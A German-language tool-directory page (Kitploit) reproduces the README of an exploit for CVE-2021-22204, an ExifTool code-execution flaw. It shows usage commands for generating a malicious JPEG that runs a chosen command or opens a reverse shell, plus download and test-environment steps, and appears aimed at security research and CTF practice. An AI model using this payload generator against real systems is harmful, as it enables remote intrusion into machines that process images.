Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-CVE-2021-22204 — Exploit für CVE-2021-22204 (ExifTool) - Beliebige Codeausführung | Kitploit
Tools/GitHubGitHub/unicordev/exploit-cve-2021-22204
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubunicordev/exploit-cve-2021-22204

exploit-CVE-2021-22204

Exploit für CVE-2021-22204 (ExifTool) - Beliebige Codeausführung

Repository anzeigen
536vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Exploit für CVE-2021-22204 (ExifTool) - Beliebige Codeausführung

GitHub CVE Cover

Gefällt dir dieses Repo? Gib uns einen ⭐!

Nur für Bildungs- und autorisierte Sicherheitsforschungszwecke.

Exploit-Autor

@UNICORDev von (@NicPWNs und @Dev-Yeoj)

Schwachstellenbeschreibung

Unsachgemäße Neutralisierung von Benutzerdaten im DjVu-Dateiformat in ExifTool-Versionen 7.44 und höher ermöglicht beliebige Codeausführung beim Parsen des schädlichen Bildes.

Exploit-Beschreibung

Verwenden Sie diesen Exploit, um eine JPEG-Bild-Payload zu erzeugen, die mit einer verwundbaren ExifTool-Version zur Codeausführung verwendet werden kann. Ein benutzerdefinierter Befehl kann angegeben oder eine Reverse-Shell erzeugt werden. Ein JPEG-Bild wird automatisch generiert; optional kann ein benutzerdefiniertes JPEG-Bild bereitgestellt werden, in das die Payload eingefügt wird.

Verwendung

root@kitploit:~
  python3 exploit-CVE-2021-22204.py -c <command>
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port>
  python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>]
  python3 exploit-CVE-2021-22204.py -h

Optionen

root@kitploit:~
  -c    Modus für benutzerdefinierten Befehl. Befehl zum Ausführen angeben.
  -s    Modus für Reverse-Shell. Lokale IP und Port angeben.
  -i    Pfad zu benutzerdefiniertem JPEG-Bild. (Optional)
  -h    Dieses Hilfemenü anzeigen.

Download

Download exploit-CVE-2021-22204.py from GitHub

Download exploit-CVE-2021-22204.py from ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50911

Exploit-Anforderungen

  • python3
  • djvulibre-bin
  • exiftool

Demo

Demo Gif

Getestet auf

Exiftool Version 12.23

Gilt für

Exiftool-Versionen 7.44 - 12.23

Verwundbare Umgebung

root@kitploit:~
wget https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip
unzip exiftool-12.23.zip
cd exiftool-12.23
perl Makefile.PL
make test
sudo make install
exiftool -ver

Teste generierte Payload

root@kitploit:~
exiftool image.jpg

Danksagungen

  • https://hackerone.com/reports/1154542
  • https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/
  • https://nvd.nist.gov/vuln/detail/CVE-2021-22204
  • https://app.hackthebox.com/machines/Overflow
  • https://www.exploit-db.com/exploits/50911
Tool herunterladen